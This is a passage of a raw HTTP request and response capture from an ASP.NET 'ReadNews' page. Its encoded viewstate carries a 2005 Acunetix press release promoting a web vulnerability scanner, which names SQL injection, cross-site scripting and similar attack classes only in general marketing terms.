CAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30486Response body (30486 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxh